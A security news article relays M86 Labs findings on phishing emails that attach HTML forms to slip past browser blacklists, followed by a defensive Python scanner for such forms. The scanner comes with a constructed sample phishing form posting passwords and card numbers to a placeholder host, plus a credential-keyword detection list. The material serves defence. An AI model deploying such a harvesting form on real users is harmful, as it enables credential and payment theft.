M86 Labs has uncovered what appears to be a new phishing trick designed to evade browser-based blacklists. Rodel Mendrez of M86 writes about it in the company blog, saying that rather than pointing a user to a phishing site, the bad guys are attaching HTML files to the spam messages, which go undetected by the browsers' phishing filters. The forms look like perfectly legitimate documents from Bank of America, Lloyds, TSB and PayPal.

In the case of the PayPal phishing HTML, once a user submits his or her information, it posts the information through a hacked PHP webserver. In this case, it is a PHP file that was hosted on fritolay.com.

“In a traditional phishing scam,” he writes, “a phisher usually sets up a website with a fake login form imitating a legitimate online service such as a bank, social networking website, auction site or a payment processing service. In an attempt to lure in users, the phisher spams a link to the website through email or instant messaging. Unfortunately for the phishers, modern browsers like Mozilla Firefox and Google Chrome have become quite good at detecting phishing, immediately warning users when a potential phishing site is being opened.”

But, he added, phishers are now evading this anti-phishing protection by attaching an HTML file to the spam email. This avoids the HTTP GET request to the phishing site, and so avoids being blocked by the browser.

He continues:

The HTML attachment, stored locally, successfully opens in the browser without the user being warned. When the victims enter their information and click the “Agree and Submit” button, the HTML form sends the stolen information through a POST request to a PHP script hosted on a hacked legitimate webserver (in one case, Fritolay.com). The phisher’s PHP script then redirects the browser to PayPal’s homepage after successfully submitting the stolen information.
While the POST request sends information to the phisher’s remote web server, Google Chrome and Mozilla Firefox did not detect any malicious activity. Months-old phishing campaigns remain undetected, so it seems this tactic is quite effective. Logically, however, the browser should be able to detect a URL when the browser sends the POST request. So what makes this type of phishing tactic harder to detect from the browser perspective? Here are a couple of reasons:

1. Few PHP URLs are reported as abuse. Average users are not able to report any URL because no phishing URL is visible, unless they are technical enough to view the HTML source code.

2. The URLs are hard to verify as phishing sites. The URL alone, without the accompanying HTML form, would be hard to verify as a phish site because the PHP script runs on the server and no visible HTML is displayed after clicking the submit button, other than redirecting the browser elsewhere to the target brand’s homepage.

We have seen an increase in these types of phishing spam campaigns over the last few months. Last month we blogged about a clever phishing campaign targeting Bank of America online users that uses this same phishing tactic. So be wary of HTML attachments included in an email. If the email seems suspicious, avoid opening the HTML attachment. And if you do happen to open it, be particularly leery of any HTML form requiring you to enter sensitive information.

The blog post includes screen shots of what these fake forms look like.
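One defensive check that follows from the M86 description, as an added example that is not from the original post or from M86: a mail-gateway style scanner for HTML attachments that flags any form posting password, PIN or card fields to an absolute URL on another host, which is exactly the shape of the attachment described above. The sample attachment, its host name and the keyword list are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Field names that suggest credential or payment harvesting (assumed list).
SENSITIVE = ("pass", "pin", "ssn", "card", "cvv", "account", "routing", "secur")

class FormScanner(HTMLParser):
    """Collect every <form> with its action URL and the <input> fields inside it."""
    def __init__(self):
        super().__init__()
        self.forms = []       # each entry: {"action": str, "fields": [(type, name)]}
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "fields": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["fields"].append(
                ((a.get("type") or "text").lower(), (a.get("name") or "").lower()))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def find_suspicious_forms(html):
    """Return forms that POST password, PIN or card fields to a remote host: the
    shape of the attachment described in the post (relative actions are ignored)."""
    scanner = FormScanner()
    scanner.feed(html)
    hits = []
    for form in scanner.forms:
        host = urlparse(form["action"]).netloc
        if not host:          # relative action stays local; not this campaign's shape
            continue
        sensitive = [n for t, n in form["fields"]
                     if t == "password" or any(k in n for k in SENSITIVE)]
        if sensitive:
            hits.append({"host": host, "fields": sensitive})
    return hits

# Constructed sample mimicking the described attachment; the host is a placeholder.
SAMPLE = """<html><body><h1>Update your PayPal account</h1>
<form method="post" action="http://hacked-host.example/images/process.php">
<input type="text" name="email"><input type="password" name="password">
<input type="text" name="card_number"><input type="submit" value="Agree and Submit">
</form></body></html>"""
```

Run `find_suspicious_forms` over each text/html attachment body before delivery; a non-empty result is a strong signal to quarantine the message and to report the action host, which is the URL the post notes users themselves never see.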
–Bill Brenner